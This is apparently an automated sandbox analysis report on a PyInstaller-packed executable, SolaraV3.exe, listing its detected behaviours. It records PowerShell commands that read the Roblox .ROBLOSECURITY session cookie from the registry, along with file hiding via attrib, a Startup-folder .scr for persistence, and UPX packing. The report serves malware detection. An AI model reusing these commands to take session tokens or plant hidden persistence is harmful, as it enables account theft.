Source:	Binary string: ;C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.pdbhP@ source: powershell.exe, 0000004A.00000002.1847941368.00000239E7D72000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: SolaraV3.exe, 00000002.00000002.2051343700.00007FFB0C5DB000.00000040.00000001.01000000.00000008.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2053371221.00007FFB1C251000.00000040.00000001.01000000.00000009.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: SolaraV3.exe, 00000002.00000002.2050924426.00007FFB0C441000.00000040.00000001.01000000.0000000B.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: SolaraV3.exe, 00000002.00000002.2052555001.00007FFB1AB01000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: SolaraV3.exe, 00000002.00000002.2052925726.00007FFB1BB11000.00000040.00000001.01000000.0000000A.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-1_1.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2047840849.00007FFB0BAE2000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 0000006E.00000000.1923151482.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmp, rar.exe, 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmp, rar.exe.1.dr
Source:	Binary string: D:\a\1\b\libssl-1_1.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2050155704.00007FFB0C3C6000.00000040.00000001.01000000.00000010.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2050619713.00007FFB0C411000.00000040.00000001.01000000.0000000E.sdmp

Source: SolaraV3.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: SolaraV3.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: SolaraV3.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: SolaraV3.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: SolaraV3.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

Compiles C# or VB.Net code

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.cmdline"

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\SolaraV3.exe

Code function: 2_2_00007FFB0BB66EE0 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,

2_2_00007FFB0BB66EE0

PE file contains an invalid checksum

Source: python310.dll.1.dr	Static PE information: real checksum: 0x0 should be: 0x179482
Source: unicodedata.pyd.1.dr	Static PE information: real checksum: 0x0 should be: 0x4d519
Source: libffi-7.dll.1.dr	Static PE information: real checksum: 0x0 should be: 0x9bb1
Source: _ctypes.pyd.1.dr	Static PE information: real checksum: 0x0 should be: 0x15162
Source: _bz2.pyd.1.dr	Static PE information: real checksum: 0x0 should be: 0x190ae
Source: sqlite3.dll.1.dr	Static PE information: real checksum: 0x0 should be: 0xa7f83
Source: libcrypto-1_1.dll.1.dr	Static PE information: real checksum: 0x0 should be: 0x118790
Source: libssl-1_1.dll.1.dr	Static PE information: real checksum: 0x0 should be: 0x3bfea
Source: SolaraV3.exe	Static PE information: real checksum: 0x60f6c0 should be: 0x6069ca
Source: _queue.pyd.1.dr	Static PE information: real checksum: 0x0 should be: 0xd20c
Source: _socket.pyd.1.dr	Static PE information: real checksum: 0x0 should be: 0x16097
Source: _ssl.pyd.1.dr	Static PE information: real checksum: 0x0 should be: 0x15afd
Source: _hashlib.pyd.1.dr	Static PE information: real checksum: 0x0 should be: 0x14a50
Source: se3yji4z.dll.93.dr	Static PE information: real checksum: 0x0 should be: 0xce6c
Source: _decimal.pyd.1.dr	Static PE information: real checksum: 0x0 should be: 0x241ea
Source: select.pyd.1.dr	Static PE information: real checksum: 0x0 should be: 0x927e
Source: _lzma.pyd.1.dr	Static PE information: real checksum: 0x0 should be: 0x2099b
Source: _sqlite3.pyd.1.dr	Static PE information: real checksum: 0x0 should be: 0x1931c

PE file contains sections with non-standard names

Source: libffi-7.dll.1.dr	Static PE information: section name: UPX2
Source: VCRUNTIME140.dll.1.dr	Static PE information: section name: _RDATA

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 14_2_00007FFAA935D2A5 pushad ; iretd

14_2_00007FFAA935D2A6

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Persistence and Installation Behavior

Found pyInstaller with non standard icon

Source: C:\Users\user\Desktop\SolaraV3.exe

Process created: "C:\Users\user\Desktop\SolaraV3.exe"

Uses attrib.exe to hide files

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\SolaraV3.exe"

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: attrib.exe	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe

Drops PE files

Source: C:\Users\user\Desktop\SolaraV3.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI28842\libcrypto-1_1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI28842\_queue.pyd	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI28842\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI28842\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI28842\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI28842\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI28842\_socket.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI28842\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI28842\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI28842\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI28842\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI28842\select.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI28842\libffi-7.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI28842\libssl-1_1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI28842\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI28842\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI28842\python310.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Jump to dropped file

Creates a start menu entry (Start Menu\Programs\Startup)

Source: C:\Users\user\Desktop\SolaraV3.exe

File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr

Jump to behavior

Stores files to the Windows start menu directory

Source: C:\Users\user\Desktop\SolaraV3.exe

File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\SolaraV3.exe

1_2_00007FF6DC7076C0

Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
